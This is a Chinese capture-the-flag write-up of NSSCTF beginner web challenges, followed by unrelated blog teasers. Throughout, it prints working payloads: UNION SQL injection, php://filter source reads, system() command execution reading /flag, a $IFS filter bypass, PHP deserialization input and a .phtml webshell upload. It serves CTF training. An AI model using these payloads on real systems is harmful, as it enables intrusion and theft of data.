NSSCTF Web 第一页

NSSCTF Web 第一页

[SWPUCTF 2021 新生赛]gift_F12

点击确定

查看源码

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[SWPUCTF 2021 新生赛]jicao

get:json={"x":"wllm"}        post:id=wllmNB

NSSCTF{47e0e900-250c-40d2-8ccf-2fef864d242a}

[SWPUCTF 2021 新生赛]easy_md5

md5弱比较绕过:314282422、571579406

NSSCTF{9668d690-7b6d-42a0-8c20-205dd6b5dc7f}

[SWPUCTF 2021 新生赛]include

/?file=flag.php

伪协议读源码:php://filter/read=convert.base64-encode/resource=flag.php

b64解密得:

<?php
$flag='NSSCTF{d44702c1-094b-489a-a0ab-50471944f73d}';

[SWPUCTF 2021 新生赛]easy_sql

字符型单引号。判断列数:/?wllm=-1' order by 4--+

/?wllm=-1' order by 3--+

共3列

查看回显位:/?wllm=-1' union select 1,2,3--+

回显位 2,3

查库:/?wllm=-1' union select 1,2,database()--+

库 test_db

查表:/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"--+

表 test_tb,users

查test_tb表的所有字段:/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="test_db" and table_name="test_tb"--+

所有字段 id,flag

查看flag字段的内容:/?wllm=-1' union select 1,2,flag from test_tb--+

NSSCTF{e2e3e44f-3751-4545-b48f-4c41818fa887}

[LitCTF 2023]我Flag呢?

查看源码

NSSCTF{cd21a6ec-88cb-46cd-b40f-1d0baa9b785f}

[SWPUCTF 2021 新生赛]easyrce

/?url=echo(system("ls /"));

/?url=echo(system("cat /flllllaaaaaaggggggg"));

NSSCTF{80867aa5-b8f8-4ebb-bbe8-d38fb3b5206f}

[SWPUCTF 2021 新生赛]caidao

wllm=system("cat /flag");

NSSCTF{c30de7d3-4048-4037-8bf6-265e61bdc95a}

[SWPUCTF 2021 新生赛]Do_you_know_http

bp抓包,将UA内容改为:WLLM

要求本地,X-Forwarded-For: 127.0.0.1

NSSCTF{6207b742-51ff-42e3-a012-aede36925162}

[SWPUCTF 2021 新生赛]babyrce

按要求传值

访问rasalghul.php

只过滤了空格,用$IFS$1绕过:/rasalghul.php?url=cat$IFS$1/flllllaaaaaaggggggg

NSSCTF{571f2fa9-f820-4245-9f42-c08d6061d016}

[第五空间 2021]WebFTP

标题中提示了git泄露

用工具下载泄漏文件:python githack.py http://node7.anna.nssctf.cn:26492/.git/

打开下载完的文件夹,发现是空的。目录扫描:

访问phpinfo.php

NSSCTF{d7c12238-0701-467f-9ca8-d0a4971e903f}

[SWPUCTF 2021 新生赛]ez_unserialize

查看源码

访问robots.txt

访问cl45s.php

poc:

<?php class wllm{ public $admin="admin"; public $passwd="ctf"; } echo serialize(new wllm());

payload:/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

NSSCTF{01336073-5e78-4911-a3ee-f7dcbf4846d3}

[SWPUCTF 2021 新生赛]easyupload2.0

只过滤了php后缀,用phtml代替即可。上传小马后,进行命令执行:cmd=system("env");

NSSCTF{cff7743d-5e0e-47f5-a56f-f28896e96f7b}

[LitCTF 2023]导弹迷踪

前端源码中没有信息,查看网络:

在game.js中发现flag:NSSCTF{y0u_w1n_th1s_!!!}

[LitCTF 2023]PHP是世界上最好的语言!!

输入php代码并执行

<?php system("cat /flag");?>

NSSCTF{cb2166a8-18d3-4c03-83eb-1fbe47d1b2b7}

Read more

国内AI开发者必备:HuggingFace镜像站hf-mirror.com的4种高效下载方法(附避坑指南)

国内AI开发者高效使用HuggingFace镜像站的完整指南 作为一名长期在AI领域耕耘的技术从业者,我深知模型和数据集下载速度对开发效率的影响。特别是在国内网络环境下,直接从HuggingFace官方源下载大型模型常常会遇到速度慢、连接不稳定等问题。经过多次实践和比较,我发现hf-mirror.com这个镜像站确实能显著改善下载体验。本文将分享四种经过验证的高效使用方法,以及你可能遇到的典型问题解决方案。 1. 为什么需要HuggingFace镜像站 对于国内开发者来说,访问国际AI资源平台时常面临网络延迟和带宽限制。以HuggingFace为例,一个几GB的模型文件可能需要数小时才能完成下载,严重影响了开发迭代速度。hf-mirror.com作为专门为国内开发者优化的镜像服务,通过国内服务器加速访问,通常能将下载速度提升3-5倍。 镜像站的工作原理并不复杂:它在国内部署了与HuggingFace官方保持同步的服务器节点,当用户发起下载请求时,数据会从最近的节点传输,避免了国际带宽的瓶颈。这种技术方案在开源社区并不少见,比如我们熟悉的PyPI和Docker Hub都有类似的

AI 应用开发工程师(Agent方向):打造未来的智能体架构!

AI 应用开发工程师(Agent方向):打造未来的智能体架构!

文章目录 * 前言 * 一、什么是 AI Agent?为什么它如此重要? * 二、AI Agent 开发工程师到底做什么? * 三、AI Agent 开发工程师需要掌握哪些技能? * 四、实战项目推荐(附 GitHub 项目) * 五、如何入行 AI Agent 开发? * 总结 前言 在 AI 领域,AI Agent(智能体) 正在成为最热门的方向之一。从 智能客服 到 自动化办公助手,再到 企业知识管理,AI Agent 正在改变人与机器的交互方式。那么,AI 应用开发工程师(Agent方向) 是做什么的?需要掌握哪些技能?如何通过实战项目提升能力?

深度解析 MySQL 与 MCP 集成:从环境构建到 AI 驱动的数据交互全流程

深度解析 MySQL 与 MCP 集成:从环境构建到 AI 驱动的数据交互全流程

前言 在当前大语言模型(LLM)应用开发的浪潮中,MCP(Model Context Protocol)协议正在成为连接 AI 模型与本地数据设施的关键桥梁。本文将以 MySQL 数据库为例,详细拆解如何通过 MCP 协议让 AI 模型直接操作关系型数据库,涵盖从服务器发现、数据库架构设计、数据初始化、MCP 配置文件编写到复杂自然语言查询与写入的全过程。 第一部分:MCP 服务器的发现与配置获取 在进行任何数据交互之前,首要任务是确立连接协议与服务源。通过蓝耘 MCP 广场,开发者可以快速检索并获取所需的 MCP 服务器配置。 在搜索栏输入 mysql 关键字,系统会立即检索出相关的 MCP 服务器资源。如下图所示,搜索结果中清晰展示了 MySQL 对应的 MCP 服务卡片。 点击选中该 MCP 服务器后,

[2026年03月15日] AI 深度早报

[2026年03月15日] AI 深度早报

📅 [2026年03月15日] AI 深度早报:GTC 开幕日,AI Agent 平台与具身世界模型双线引爆 👋 晨间导读 今天是 NVIDIA GTC 2026 的开幕日,也是本周 AI 圈最密集的一个爆发点。三件事同时发生:NVIDIA 用 NemoClaw 宣示进入 Agent 基础设施赛道;微软开源 AgentRx,把 AI Agent 的调试工程化带上台面;与此同时,来自中国的大晓机器人悄悄开源了一个端侧运行的具身世界模型,推理速度比前代快 72 倍。AI Coding 走向"平台化",具身智能走向"可部署"——变化正在加速,今天的早报将带你抓住最关键的信号。 1. 🚀 NVIDIA GTC